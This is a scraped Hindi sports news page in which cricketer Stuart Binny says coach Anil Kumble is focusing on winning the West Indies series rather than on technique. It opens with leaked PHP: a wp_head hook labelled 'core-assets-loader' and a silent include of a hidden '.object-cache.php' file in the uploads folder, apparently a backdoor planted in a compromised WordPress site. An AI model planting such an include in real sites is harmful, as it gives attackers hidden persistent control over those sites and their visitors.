add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बिन्नी ने कहा, तकनीकी पहलुओं की जगह जीतने पर ध्यान दे रहे हैं कुंबले – SOCH INDIA
Menu

खेल
बिन्नी ने कहा, तकनीकी पहलुओं की जगह जीतने पर ध्यान दे रहे हैं कुंबले

nobanner

बेंगलुरू। भारतीय ऑलराउंडर स्टुअर्ट बिन्नी ने कहा कि नए मुख्य कोच अनिल कुंबले खेल के तकनीकी पहलुओं में उलझने की जगह जीत का खाका तैयार करने पर ध्यान दे रहे हैं।

बिन्नी ने चिन्नास्वामी स्टेडियम में कहा कि फिलहाल उन्होंने (कुंबले ने) सिर्फ सकारात्मक चीजों की बात की है। उन्होंने कोई तकनीकी बात नहीं की बल्कि वेस्टइंडीज श्रृंखला की तैयारी की बात की। श्रृंखला जीतने की तैयारी। तकनीकी पहलुओं पर ध्यान लगाने की जगह वह जीत का खाका तैयार करने पर अधिक ध्यान दे रहे हैं। बिन्नी ने कहा कि कुंबले को पता है कि उनसे किस चीज की जरूरत है क्योंकि उन्होंने उन्हें पिछले आठ साल में प्रगति करते हुए देखा है।

बिन्नी ने कहा, तकनीकी पहलुओं की जगह जीतने पर ध्यान दे रहे हैं कुंबले
भारतीय ऑलराउंडर स्टुअर्ट बिन्नी ने कहा कि नए मुख्य कोच अनिल कुंबले खेल के तकनीकी पहलुओं में उलझने की जगह जीत का खाका तैयार करने पर ध्यान दे रहे हैं।

उन्होंने कहा कि मैं अनिल भाई को तब से जानता हूं जब से मैं उनके नेतृत्व में रणजी मैचों में खेलता था। उन्होंने मेरी प्रगति देखी है और मेरे खेल को काफी अच्छी तरह जानते हैं।